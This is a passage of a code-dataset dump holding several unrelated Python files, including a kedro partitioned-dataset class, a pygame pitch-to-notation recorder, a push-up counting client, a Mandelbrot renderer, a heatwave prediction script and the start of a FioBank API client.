continue\n if flag == 0:\n stk.append([0, cur.right])\n stk.append([1, cur])\n stk.append([0, cur.left])\n else:\n res.append(cur.val)\n\n return res\n\n\ni = 0\ntree = [1, 2, '#', '#', 3, 4, '#', '#', 5, '#', '#']\ndef buildTree():\n global i\n global tree\n val = tree[i]\n i += 1\n if val == '#':\n return\n root = TreeNode(val)\n root.left = buildTree()\n root.right = buildTree()\n return root\n\n\nroot = buildTree()\nsolution = Solution()\nprint(solution.inorderTraversal2(root))\n","sub_path":"栈/一般栈应用/94. 二叉树的中序遍历.py","file_name":"94. 二叉树的中序遍历.py","file_ext":"py","file_size_in_byte":1292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"224426834","text":"# Copyright 2018-2019 QuantumBlack Visual Analytics Limited\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND,\n# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES\n# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, AND\n# NONINFRINGEMENT. IN NO EVENT WILL THE LICENSOR OR OTHER CONTRIBUTORS\n# BE LIABLE FOR ANY CLAIM, DAMAGES, OR OTHER LIABILITY, WHETHER IN AN\n# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF, OR IN\n# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n#\n# The QuantumBlack Visual Analytics Limited (\"QuantumBlack\") name and logo\n# (either separately or in combination, \"QuantumBlack Trademarks\") are\n# trademarks of QuantumBlack. The License does not grant you any right or\n# license to the QuantumBlack Trademarks. 
You may not use the QuantumBlack\n# Trademarks or any confusingly similar mark as a trademark for your product,\n# or use the QuantumBlack Trademarks in any other manner that might cause\n# confusion in the marketplace, including but not limited to in advertising,\n# on websites, or on software.\n#\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"``PartitionedDataSet`` loads and saves partitioned file-like data using the\nunderlying dataset definition. It also uses `fsspec` for filesystem level operations.\n\"\"\"\n\nfrom copy import deepcopy\nfrom functools import lru_cache\nfrom typing import Any, Callable, Dict, List, Tuple, Type, Union\nfrom warnings import warn\n\nimport fsspec\nfrom fsspec.utils import infer_storage_options\n\nfrom kedro.io.core import (\n VERSION_KEY,\n VERSIONED_FLAG_KEY,\n AbstractDataSet,\n DataSetError,\n parse_dataset_definition,\n)\nfrom kedro.io.data_catalog import CREDENTIALS_KEY\n\nDATASET_CREDENTIALS_KEY = \"dataset_credentials\"\n\nS3_PROTOCOLS = (\"s3\", \"s3a\", \"s3n\")\n\n\nclass PartitionedDataSet(AbstractDataSet):\n # pylint: disable=too-many-instance-attributes\n \"\"\"``PartitionedDataSet`` loads and saves partitioned file-like data using the\n underlying dataset definition. For filesystem level operations it uses `fsspec`:\n https://github.com/intake/filesystem_spec.\n\n Example:\n ::\n\n >>> import pandas as pd\n >>> from kedro.io import PartitionedDataSet\n >>>\n >>> credentials = {\n >>> \"key1\": \"secret1\", # will be passed to 'fsspec.filesystem()' call\n >>> \"dataset_credentials\": { # will be passed to the dataset initializer\n >>> \"key2\": \"secret2\",\n >>> \"key3\": \"secret3\"\n >>> }\n >>> }\n >>>\n >>> data_set = PartitionedDataSet(\n >>> path=\"s3://bucket-name/path/to/folder\",\n >>> dataset=\"CSVS3DataSet\",\n >>> credentials=credentials\n >>> )\n >>> loaded = data_set.load()\n >>> # assert isinstance(loaded, dict)\n >>>\n >>> combine_all = pd.DataFrame()\n >>>\n >>> for partition_id, partition_load_func in loaded.items():\n >>> partition_data = partition_load_func()\n >>> combine_all = pd.concat(\n >>> [combine_all, partition_data], ignore_index=True, sort=True\n >>> )\n >>>\n >>> new_data = pd.DataFrame({\"new\": [1, 2]})\n >>> # creates \"s3://bucket-name/path/to/folder/new/partition.csv\"\n >>> data_set.save({\"new/partition.csv\": new_data})\n >>>\n \"\"\"\n\n def __init__( # pylint: disable=too-many-arguments\n self,\n path: str,\n dataset: Union[str, Type[AbstractDataSet], Dict[str, Any]],\n filepath_arg: str = \"filepath\",\n filename_suffix: str = \"\",\n credentials: Dict[str, Any] = None,\n load_args: Dict[str, Any] = None,\n ):\n \"\"\"Creates a new instance of ``PartitionedDataSet``.\n\n Args:\n path: Path to the folder containing partitioned data.\n If path starts with the protocol (e.g., ``s3://``) then the\n corresponding ``fsspec`` concrete filesystem implementation will\n be used. If protocol is not specified,\n ``fsspec.implementations.local.LocalFileSystem`` will be used.\n **Note:** Some concrete implementations are bundled with ``fsspec``,\n while others (like ``s3`` or ``gcs``) must be installed separately\n prior to usage of the ``PartitionedDataSet``.\n dataset: Underlying dataset definition. 
This is used to instantiate\n the dataset for each file located inside the ``path``.\n Accepted formats are:\n a) object of a class that inherits from ``AbstractDataSet``\n b) a string representing a fully qualified class name to such class\n c) a dictionary with ``type`` key pointing to a string from b),\n other keys are passed to the Dataset initializer.\n **Note:** Credentials resolution is *not* currently supported\n for the underlying dataset definition.\n filepath_arg: Underlying dataset initializer argument that will\n contain a path to each corresponding partition file.\n If unspecified, defaults to \"filepath\".\n filename_suffix: If specified, only partitions that end with this\n string will be processed.\n credentials: Protocol-specific options that will be passed to\n ``fsspec.filesystem`` call:\n https://filesystem-spec.readthedocs.io/en/latest/api.html#fsspec.filesystem\n _and_ also to the underlying dataset initializer. If\n ``dataset_credentials`` key is present in this dictionary, then\n only its value will be passed to the dataset initializer ``credentials``\n argument instead of the copy of the entire dictionary.\n\n Example 1: If ``credentials = {\"k1\": \"secret1\"}``, then filesystem\n is called as ``filesystem(..., k1=\"secret1\")``, the dataset is\n instantiated as\n ``dataset_class(..., credentials={\"k1\": \"secret1\"})``.\n Example 2: If\n ``credentials = {\"k1\": \"secret1\", \"dataset_credentials\": {\"k2\": \"secret2\"}}``,\n then filesystem is called as ``filesystem(..., k1=\"secret1\")``,\n the dataset is instantiated as\n ``dataset_class(..., credentials={\"k2\": \"secret2\"})``.\n Example 3: If\n ``credentials = {\"dataset_credentials\": {\"k2\": \"secret2\"}}``,\n then credentials are not passed to the filesystem call, the dataset\n is instantiated as\n ``dataset_class(..., credentials={\"k2\": \"secret2\"})``.\n Example 4: If\n ``credentials = {\"k1\": \"secret1\", \"dataset_credentials\": None}``,\n then filesystem is called as ``filesystem(..., k1=\"secret1\")``,\n credentials are not passed to the dataset initializer.\n\n load_args: Keyword arguments to be passed into ``find()`` method of\n the filesystem implementation.\n\n Raises:\n DataSetError: If versioning is enabled for the underlying dataset.\n \"\"\"\n super().__init__()\n\n self._path = path\n self._filename_suffix = filename_suffix\n self._protocol = infer_storage_options(self._path)[\"protocol\"]\n\n dataset = dataset if isinstance(dataset, dict) else {\"type\": dataset}\n self._dataset_type, self._dataset_config = parse_dataset_definition(dataset)\n if VERSION_KEY in self._dataset_config:\n raise DataSetError(\n \"`{}` does not support versioning of the underlying dataset. \"\n \"Please remove `{}` flag from the dataset definition.\".format(\n self.__class__.__name__, VERSIONED_FLAG_KEY\n )\n )\n\n if CREDENTIALS_KEY in self._dataset_config:\n raise DataSetError(\n \"Credentials for the underlying dataset must not be specified \"\n \"explicitly in dataset configuration. 
Please put those under \"\n \"`dataset_credentials` key in a dictionary and pass as \"\n \"`credentials` argument to {} initializer.\".format(\n self.__class__.__name__\n )\n )\n self._credentials, dataset_credentials = _split_credentials(credentials)\n if dataset_credentials:\n self._dataset_config[CREDENTIALS_KEY] = dataset_credentials\n\n self._filepath_arg = filepath_arg\n if self._filepath_arg in self._dataset_config:\n warn(\n \"`{}` key must not be specified in the dataset definition as it \"\n \"will be overwritten by partition path\".format(self._filepath_arg)\n )\n\n self._load_args = deepcopy(load_args) or {}\n self._sep = self._filesystem.sep\n # since some filesystem implementations may implement a global cache\n self.invalidate_cache()\n\n @property\n def _filesystem(self) -> fsspec.AbstractFileSystem:\n protocol = \"s3\" if self._protocol in S3_PROTOCOLS else self._protocol\n return fsspec.filesystem(protocol, **self._credentials)\n\n @lru_cache(maxsize=None)\n def _list_partitions(self) -> List[str]:\n return [\n path\n for path in self._filesystem.find(self._path, **self._load_args)\n if path.endswith(self._filename_suffix)\n ]\n\n def _join_protocol(self, path: str) -> str:\n if self._path.startswith(self._protocol) and not path.startswith(\n self._protocol\n ):\n return \"{}://{}\".format(self._protocol, path)\n return path\n\n def _partition_to_path(self, path: str):\n dir_path = self._path.rstrip(self._sep)\n path = path.lstrip(self._sep)\n full_path = self._sep.join([dir_path, path]) + self._filename_suffix\n return full_path\n\n def _path_to_partition(self, path: str) -> str:\n dir_path = self._filesystem._strip_protocol( # pylint: disable=protected-access\n self._path\n )\n path = path.split(dir_path, 1).pop().lstrip(self._sep)\n if self._filename_suffix and path.endswith(self._filename_suffix):\n path = path[: -len(self._filename_suffix)]\n return path\n\n def _load(self) -> Dict[str, Callable[[], Any]]:\n partitions = {}\n\n for partition in self._list_partitions():\n kwargs = deepcopy(self._dataset_config)\n # join the protocol back since PySpark may rely on it\n kwargs[self._filepath_arg] = self._join_protocol(partition)\n dataset = self._dataset_type(**kwargs) # type: ignore\n partition_id = self._path_to_partition(partition)\n partitions[partition_id] = dataset.load\n\n if not partitions:\n raise DataSetError(\"No partitions found in `{}`\".format(self._path))\n\n return partitions\n\n def _save(self, data: Dict[str, Any]) -> None:\n for partition_id, partition_data in sorted(data.items()):\n kwargs = deepcopy(self._dataset_config)\n partition = self._partition_to_path(partition_id)\n # join the protocol back since tools like PySpark may rely on it\n kwargs[self._filepath_arg] = self._join_protocol(partition)\n dataset = self._dataset_type(**kwargs) # type: ignore\n dataset.save(partition_data)\n self.invalidate_cache()\n\n def _describe(self) -> Dict[str, Any]:\n clean_dataset_config = (\n {k: v for k, v in self._dataset_config.items() if k != CREDENTIALS_KEY}\n if isinstance(self._dataset_config, dict)\n else self._dataset_config\n )\n return dict(\n path=self._path,\n dataset_type=self._dataset_type.__name__,\n dataset_config=clean_dataset_config,\n )\n\n def invalidate_cache(self):\n \"\"\"Invalidate `_list_partitions` method and underlying filesystem caches.\"\"\"\n self._list_partitions.cache_clear()\n self._filesystem.invalidate_cache(self._path)\n\n def _exists(self) -> bool:\n return bool(self._list_partitions())\n\n def _release(self) -> None:\n 
self.invalidate_cache()\n\n\ndef _split_credentials(\n credentials: Union[Dict[str, Any], None]\n) -> Tuple[Dict[str, Any], Any]:\n credentials = deepcopy(credentials) or {}\n dataset_credentials = credentials.pop(\n DATASET_CREDENTIALS_KEY, deepcopy(credentials)\n )\n return credentials, dataset_credentials\n","sub_path":"kedro/io/partitioned_data_set.py","file_name":"partitioned_data_set.py","file_ext":"py","file_size_in_byte":12934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"62589768","text":"import pygame\nfrom pygame.locals import *\nimport sys\nimport pyaudio\nimport aubio\nimport numpy as np\n\npygame.init()\nwindow = pygame.display.set_mode((1147, 630))\npygame.display.set_caption('Rejestrator nut')\nbackground44cm = pygame.image.load('media/staff/staff44cm.png')\nnote = pygame.image.load('media/notes/quarter.png')\nnoteH = pygame.image.load('media/notes/quarterH.png')\nnoteC = pygame.image.load('media/notes/quarterC.png')\nsharp = pygame.image.load('media/notes/quarterC#.png')\nbarline = pygame.image.load('media/staff/barline1.png')\nscreen = pygame.display.get_surface()\n\n# if metrum -- 4 4:\nscreen.blit(background44cm, (0,0))\npygame.display.flip()\n\np = pyaudio.PyAudio()\nstream = p.open(format=pyaudio.paFloat32,\n channels=1,\n rate=44100,\n input=True,\n frames_per_buffer=1024)\n\npDetection = aubio.pitch(\"default\", 2048, 2048 // 2, 44100)\npDetection.set_unit(\"Hz\")\npDetection.set_silence(-40)\n\ndef input(events):\n for event in events:\n if event.type == QUIT:\n sys.exit(0)\n \nfreq = 0\nbar = 0\nINTERVAL = 30\nA = 9\n\nx = 80\nh = 131\ny1 = 36\ny2 = 32\ny3 = 25\ny4 = 19\ny5 = 13\ny6 = 7\ny7 = 0\ny8 = -7\n\n\nwhile True:\n input(pygame.event.get())\n data = stream.read(1024)\n samples = np.fromstring(data, dtype=aubio.float_type)\n pitch = pDetection(samples)[0]\n\n if 520 <= pitch <= 540:\n freq += 1\n if freq == A:\n screen.blit(noteC, (x, y1))\n if screen.blit(noteC, (x, y1)):\n bar += 1\n pygame.display.flip()\n freq -= A\n x += INTERVAL\n elif 550 <= pitch <= 570:\n freq += 1\n if freq == A:\n screen.blit(sharp, (x, y1))\n if screen.blit(sharp, (x, y1)):\n bar += 1\n pygame.display.flip()\n freq -= A\n x += INTERVAL\n elif 580 <= pitch <= 600:\n freq += 1\n if freq == A:\n screen.blit(note, (x, y2))\n if screen.blit(note, (x, y2)):\n bar += 1\n pygame.display.flip()\n freq -= A\n x += INTERVAL\n elif 640 <= pitch <= 660:\n freq += 1\n if freq == A:\n screen.blit(note, (x, y3))\n if screen.blit(note, (x, y3)):\n bar += 1\n pygame.display.flip()\n freq -= A\n x += INTERVAL\n elif 690 <= pitch <= 710:\n freq += 1\n if freq == A:\n screen.blit(note, (x, y4))\n if screen.blit(note, (x, y4)):\n bar += 1\n pygame.display.flip()\n freq-= A\n x += INTERVAL\n elif 765 <= pitch <= 785:\n freq += 1\n if freq == A:\n screen.blit(note, (x, y5))\n if screen.blit(note, (x, y5)):\n bar += 1\n pygame.display.flip()\n freq -= A\n x += INTERVAL\n elif 855 <= pitch <= 875:\n freq += 1\n if freq== A:\n screen.blit(note, (x, y6))\n if screen.blit(note, (x, y6)):\n bar += 1\n pygame.display.flip()\n freq -= A\n x += INTERVAL\n elif 960 <= pitch <= 970:\n freq += 1\n if freq == A:\n screen.blit(noteH, (x, y7))\n if screen.blit(noteH, (x, y7)):\n bar += 1\n pygame.display.flip()\n freq -= A\n x += INTERVAL\n elif 1015 <= pitch <= 1035:\n freq += 1\n if freq == A:\n screen.blit(noteH, (x, y8))\n if screen.blit(noteH, (x, y8)):\n bar += 1\n pygame.display.flip()\n freq -= A\n x += INTERVAL\n if bar == 4:\n x += INTERVAL\n 
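# after every fourth recorded note, draw a barline and reset the measure counter\n        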
screen.blit(barline, (x, y3 - 3))\n        x += INTERVAL\n        bar -= 4\n\n    if x == 1160:\n        x = 80\n        y1 += h\n        y2 += h\n        y3 += h\n        y4 += h\n        y5 += h\n        y6 += h\n        y7 += h\n        y8 += h\n","sub_path":"score.py","file_name":"score.py","file_ext":"py","file_size_in_byte":3719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"}
{"seq_id":"591485729","text":"import cv2\nimport numpy as np\nimport socket\nimport sys\nimport pickle\nimport struct\n\n\nprint('pose')\nA = 0\nB = 0\nC = 0\n\nstepA = False\nstepB = False\ncount = 0\n\nfont = cv2.FONT_HERSHEY_SIMPLEX\nbottomLeftCornerOfText = (50, 400)\ntopLeft = (150, 400)\n\nfontScale = 3\nfontColor = (255, 0, 0)\nlineType = 2\n\n\ncap=cv2.VideoCapture(0)\nclientsocket=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\nclientsocket.connect(('54.180.176.99',8089))\n#cap = cv2.VideoCapture('pushUp.mp4')\nwhile True:\n    ret, frame=cap.read()\n    # Serialize frame\n    #frame = cv2.transpose(frame)\n    #frame = cv2.flip(frame,flipCode=1)\n    data = pickle.dumps(frame)\n    # Send message length first\n    message_size = struct.pack(\"=L\", len(data))\n\n    # Then data\n    clientsocket.sendall(message_size + data)\n\n    pose = clientsocket.recv(4096)\n    pose = pickle.loads(pose)\n\n\n\n    pose.draw(frame)\n    cv2.imshow('test', frame)\n    if cv2.waitKey(1) == ord('q'):\n        break\n\n\n\n    A = np.array([pose.keypoints[2][0],pose.keypoints[2][1]])\n    # use equality, not identity: B and C become numpy arrays after the first frame\n    if B == 0:\n        B = np.array([pose.keypoints[10][0],pose.keypoints[10][1]])\n    if C == 0:\n        C = np.array([pose.keypoints[4][0],pose.keypoints[4][1]])\n\n    BA = A - B\n    BC = C - B\n\n    cosine_angle = np.dot(BA, BC) / (np.linalg.norm(BA) * np.linalg.norm(BC))\n    angle = np.arccos(cosine_angle)\n    angle = np.degrees(angle)\n    print(angle)\n\n    if angle > 25 :\n        stepA = True\n    if angle < 15 :\n        stepB = True\n\n    if stepA and stepB:\n        if angle > 25:\n            stepA = False\n            stepB = False\n            count += 1\n\n            cv2.putText(frame,\"good\",\n                        topLeft,\n                        font,\n                        fontScale,\n                        fontColor,\n                        lineType)\n    if stepA and not stepB:\n        if angle > 25:\n            stepA = False\n            stepB = False\n    cv2.putText(frame, \"count\" + str(count),\n                bottomLeftCornerOfText,\n                font,\n                fontScale,\n                fontColor,\n                lineType)\n    #cv2.imshow(\"img\", frame)\n\n    print(count)\n\n","sub_path":"lightweight-human-pose-estimation.pytorch-master/pushUpClient.py","file_name":"pushUpClient.py","file_ext":"py","file_size_in_byte":2140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"}
{"seq_id":"166916108","text":"import numpy as np\nfrom PIL import Image\nimport cmath\nimport time \n\n\nheight = 1000\nwidth = 1000\n\ndata = np.zeros( (height, width,3), dtype=np.uint8 )\n\nre_lb = -2\nre_ub = 2\nim_lb = -2\nim_ub = 2\n\nre_interval = (re_ub - re_lb) / width\nim_interval = (im_ub - im_lb) / height\n\n\ndef test_converge(re, im):\n    z = complex(re, im)\n    seed = complex(0,0)\n    iterations = 0\n    \n    while seed.real**2+seed.imag**2 < 10 and iterations < 100:\n        new_z = seed*seed + z\n        seed = new_z\n        iterations += 1\n\n    if iterations == 100:\n        return 0\n    else:\n        return (iterations * 3.6)\n\nstart = time.time()\n\nfor i in range(width):\n    re_val = re_lb + i * re_interval\n    for j in range(height):\n        im_val = im_lb + j * im_interval\n\n        colour = test_converge(re_val, im_val)\n        if colour == 0:\n            data[j, i] = (0,0,0)\n        else:\n            data[j,i] = (215, 254, colour) # makes a nice fade out as divergence speed increases - as you go away from the fractal\n\n\n\n\nmandelbrot_set = Image.fromarray(data, mode = \"HSV\")\n\nmandelbrot_set.show()\nend = 
time.time()\nprint(end - start)\n\n\n\n\n\n\n","sub_path":"mandelbrot.py","file_name":"mandelbrot.py","file_ext":"py","file_size_in_byte":1134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"}
{"seq_id":"647005210","text":"import os\nimport pandas as pd\npwd=r'C:\\Users\\jnjga\\Desktop\\university\\服创\\ts\\Data_FCDS_hashed'\nsv_path=os.path.join(pwd,'all.csv')\nif os.path.exists(sv_path):\n    os.remove(sv_path)\nfiles=os.listdir(pwd)\nfiles=files[:8]\ndf = pd.read_csv(pwd +'\\\\'+ files[0]) \ndf.to_csv(sv_path,encoding=\"utf_8_sig\",index=False)\nall_df=pd.read_csv(sv_path)\n\n# Loop over the remaining CSV file names and outer-join each one into the merged frame\nfor i in range(1,len(files)):\n    print(files[i])\n    new_df = pd.read_csv(pwd + '\\\\'+ files[i], encoding='ISO-8859-1')\n    all_df = pd.merge(all_df,new_df,how = 'outer',on='entname')\n\nos.remove(sv_path)\nall_df.to_csv(sv_path,encoding=\"utf_8_sig\",index=False)\n","sub_path":"nonsense/try_1/merge.py","file_name":"merge.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"}
{"seq_id":"387361355","text":"def VHF(close,period=28):\n    HCP=[]\n    LCP=[]\n    sums=[close[0]]\n    denum=[]\n    for i in range(period-1):\n        HCP.append(max(close[:i+1]))\n        LCP.append(min(close[:i+1]))\n        sums.append(abs(close[i]-close[i-1]))\n        denum.append(sum(sums[:i+1]))\n    for i in range(period-1,len(close)):\n        HCP.append(max(close[i-period+1:i+1]))\n        LCP.append(min(close[i-period+1:i+1]))\n        sums.append(abs(close[i]-close[i-1]))\n        denum.append(sum(sums[i-period+1:i+1]))\n    VHF=[(i-j)/k for (i,j,k) in zip(HCP,LCP,denum)]\n    return VHF\n","sub_path":"Day043/VHF.py","file_name":"VHF.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"}
{"seq_id":"362741509","text":"import pytest\n\nfrom ...core import ProxyTypeError\nfrom ...primitives import Int, Str\nfrom ...geospatial import ImageCollection, Image, FeatureCollection, GeometryCollection\n\nfrom ..
import Tuple, List, zip as wf_zip\n\n\nexamples = [\n List[Int]([1, 2, 3]),\n List[Str]([\"a\", \"b\", \"c\"]),\n List[Tuple[Int, Str]]([(1, \"foo\"), (3, \"bar\")]),\n ImageCollection.from_id(\"foo\"),\n Image.from_id(\"foo\"),\n FeatureCollection.from_vector_id(\"bar\"),\n GeometryCollection.from_geojson({\"type\": \"GeometryCollection\", \"geometries\": []}),\n]\n\n\n@pytest.mark.parametrize(\"args\", [examples, ()] + [(ex,) for ex in examples])\ndef test_zip(args):\n zipped = wf_zip(*args)\n assert isinstance(\n zipped,\n List[Tuple[tuple(getattr(arg, \"_element_type\", type(arg)) for arg in args)]],\n )\n\n\ndef test_zip_str():\n zipped = wf_zip(Str(\"abcd\"), List[Int]([1, 2, 3]))\n assert isinstance(zipped, List[Tuple[Str, Int]])\n\n\n@pytest.mark.parametrize(\n \"seqs\",\n [\n [List[Int]([1, 2, 3]), [1, 2, 3]],\n [List[Int]([1, 2, 3]), Tuple[Int, Int, Int]([1, 2, 3])],\n [List[Int]([1, 2, 3]), \"asdf\"],\n ],\n)\ndef test_zip_wrong_args(seqs):\n with pytest.raises(\n ProxyTypeError, match=\"All arguments to 'zip' must be Proxytype sequences\"\n ):\n wf_zip(*seqs)\n","sub_path":"descarteslabs/workflows/types/containers/tests/test_zip.py","file_name":"test_zip.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"970694","text":"import pickle\n\nimport requests\n\n\nurl = 'http://avilpage.com'\n\n# build query url\npayload = {'start': 10, 'end': 20}\nresponse = requests.get(url, params=payload)\nprint(response.url)\n\nresp = requests.post(url, headers={'Authorization': 'Basic foo'})\ndata = resp.json()\n\nr = requests.post('http://httpbin.org/post', data = {'key':'value'})\n\n\nwith open('d.pkl', 'wb') as fh:\n pickle.dump(data, fh)\n\n\n# save image\nimport requests\nimport shutil\n\nr = requests.get(settings.STATICMAP_URL.format(**data), stream=True)\nif r.status_code == 200:\n with open(path, 'wb') as f:\n r.raw.decode_content = True\n shutil.copyfileobj(r.raw, f)\n","sub_path":"python/requests_exp.py","file_name":"requests_exp.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"534745693","text":"# Read Data\ndata_path = 'test_load_data/MERRA2_400.statD_2d_slv_Nx.'\nselected_date = '20191003'\ntt_path = data_path + selected_date + '.nc4'\nlongitude = int(120.982024)\nlatitude = int(23.973875) \n\n# Import package\n# PyTorch\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data import Dataset, DataLoader\n\n# For data preprocess\nimport numpy as np\nfrom netCDF4 import Dataset as nDS\nimport csv\nimport os\nfrom datetime import date\n\nmyseed = 42069 # set a random seed for reproducibility\ntorch.backends.cudnn.deterministic = True\ntorch.backends.cudnn.benchmark = False\nnp.random.seed(myseed)\ntorch.manual_seed(myseed)\nif torch.cuda.is_available():\n torch.cuda.manual_seed_all(myseed)\n\n# Utilities\ndef get_device():\n ''' Get device (if GPU is available, use GPU) '''\n return 'cuda' if torch.cuda.is_available() else 'cpu'\n\ndef is_leap_year(year):\n if (year % 4) == 0:\n if (year % 100) == 0:\n if (year % 400) == 0:\n return True \n else:\n return False\n else:\n return True\n else:\n return False\n\n# Dataset\nclass heatwaveDataset(Dataset):\n def __init__(self, path, mode='test', target_only=False):\n self.mode = mode\n\n # Init data\n data = torch.zeros([1, 361, 576, 1, features_num], dtype = torch.float64)\n # Recursively read and preprocess daily air temperature data\n year 
= path[-12: -8]\n month = path[-8: -6]\n day = path[-6: -4]\n if int((year + month + day)) > 20210930:\n year = '2021'\n month = '09'\n day = '30'\n\n year = int(year)\n month = int(month)\n day = int(day)\n\n for i in range(1, 5):\n t_year = year\n t_month = month\n t_day = day\n \n t_day = t_day - i\n if t_day <= 0:\n t_month = 12 if t_month-1 == 0 else t_month-1\n if t_month == 12:\n t_year -= 1\n t_day = 31 + day - i\n elif t_month == 2 and is_leap_year(t_year):\n t_day = 29 + day - i\n elif t_month == 2:\n t_day = 28 + day - i\n elif t_month in [1,3,5,7,8,10]:\n t_day = 31 + day - i\n elif t_month in [4,6,9,11]:\n t_day = 30 + day - i\n\n print([t_year, t_month, t_day])\n nasa_data = nDS(path[:-12] + str(t_year) + str(t_month).rjust(2,'0') + str(t_day).rjust(2,'0') +'.nc4', mode='r')\n \n T2MMAX = torch.tensor(nasa_data.variables['T2MMAX'][:,:,:].astype(float))\n TPRECMAX = torch.tensor(nasa_data.variables['TPRECMAX'][:,:,:].astype(float))\n\n # Extend to five dimensions\n T2MMAX = torch.unsqueeze((T2MMAX), 3)\n TPRECMAX = torch.unsqueeze((TPRECMAX), 3)\n T2MMAX = torch.unsqueeze((T2MMAX), 4)\n TPRECMAX = torch.unsqueeze((TPRECMAX), 4)\n\n # Store all data in fifth dimension\n temp_data = torch.cat((TPRECMAX, T2MMAX), 4)\n data = torch.cat((data, temp_data), 3)\n\n y_axis = 180 - latitude\n x_axis = 288 + longitude\n data = data[0, y_axis, x_axis, 1:, :]\n \n \n # Testing data\n self.data = data\n\n # Normalize features\n self.data[:, :] = \\\n (self.data[:, :] - self.data[:, :].mean(dim=0, keepdim=True)) \\\n / self.data[:, :].std(dim=0, keepdim=True) \n \n self.dim = self.data.shape[1]\n\n print('Finished reading the {} set of heatwave Dataset ({} samples found, each dim = {})'.format(mode, len(self.data), self.dim))\n\n def __getitem__(self, index):\n # Returns one sample at a time\n # For testing (no target)\n return self.data[index]\n\n def __len__(self):\n # Returns the size of the dataset\n return len(self.data)\n\n# Dataloader\ndef prep_dataloader(path, mode, batch_size, n_jobs=0, target_only=False):\n ''' Generates a dataset, then is put into a dataloader. 
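Shuffling is enabled only in 'train' mode, so test batches keep their original order. 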
'''\n dataset = heatwaveDataset(path, mode=mode, target_only=target_only) # Construct dataset\n dataloader = DataLoader(\n dataset, batch_size,\n shuffle=(mode == 'train'), drop_last=False,\n num_workers=n_jobs, pin_memory=True) # Construct dataloader\n return dataloader\n\n# Deep Neural Network\nclass NeuralNet(nn.Module):\n ''' A simple fully-connected deep neural network '''\n def __init__(self, input_dim):\n super(NeuralNet, self).__init__()\n\n self.net = nn.Sequential(\n nn.Linear(input_dim, 64).float(),\n nn.ReLU().float(),\n nn.Linear(64, 1).float()\n )\n\n # Mean squared error loss\n self.criterion = nn.MSELoss(reduction='mean')\n\n def forward(self, x):\n ''' Given input of size (batch_size x input_dim), compute output of the network '''\n # TODO: improve model\n return self.net(x.float()).squeeze(1)\n\n def cal_loss(self, pred, target):\n ''' Calculate loss '''\n # TODO: you may implement L1/L2 regularization here\n return self.criterion(pred, target)\n\n# Testing\ndef test(load_set, model, device):\n model.eval() # set model to evalutation mode\n preds = []\n for x in load_set: # iterate through the dataloader\n x = x.to(device) # move data to device (cpu/cuda)\n with torch.no_grad(): # disable gradient calculation\n pred = model(x) # forward pass (compute output)\n preds.append(pred.detach().cpu()) # collect prediction\n preds = torch.cat(preds, dim=0).numpy() # concatenate all predictions and convert to a numpy array\n return preds\n\n# Setup Hyperparameter\ndevice = get_device() # get the current available device ('cpu' or 'cuda')\nos.makedirs('models', exist_ok=True) # The trained model will be saved to ./models/\ntarget_only = False # False: Using Whole features\nfeatures_num = 2\n\nconfig = {\n 'batch_size': 24, # mini-batch size for dataloader\n 'model_path': 'models/model.pth' # your model will be saved here\n}\n\n# Load Data & Model\nload_set = prep_dataloader(tt_path, 'test', config['batch_size'], target_only=target_only)\n\nmodel = NeuralNet(load_set.dataset.dim).to(device)\nckpt = torch.load(config['model_path'], map_location='cpu') # Load your best model\nmodel.load_state_dict(ckpt)\n\n# Testing & Saving Prediction\ndef save_pred(preds, file):\n ''' Save predictions to specified file '''\n print('Saving results to {}'.format(file))\n with open(file, 'w') as fp:\n writer = csv.writer(fp)\n writer.writerow(['id', 'tested_positive'])\n for i, p in enumerate(preds):\n writer.writerow([i, p])\n\npreds = test(load_set, model, device) # predict heatwave cases with your model\nsave_pred(preds, 'pred.csv') # save prediction file to pred.csv","sub_path":"dnn_load_daily_data.py","file_name":"dnn_load_daily_data.py","file_ext":"py","file_size_in_byte":7052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"407086227","text":"# -*- coding: utf-8 -*-\n\nimport re\nfrom datetime import datetime, date\n\nimport requests\nimport xmltodict\n\n\n__all__ = ('FioBank',)\n\n\ndef coerce_date(value):\n if isinstance(value, date):\n return value\n elif isinstance(value, datetime):\n return value.date()\n else:\n return datetime.strptime(value[:10], '%Y-%m-%d').date()\n\n\ndef sanitize_value(value, convert=None):\n if isinstance(value, basestring):\n value = value.strip() or None\n if convert and value:\n return convert(value)\n return value\n\n\nclass FioBank(object):\n\n base_url = 'https://www.fio.cz/ib_api/rest/'\n\n actions = {\n 'periods': 'periods/{token}/{from_date}/{to_date}/transactions.json',\n 'by-id': 
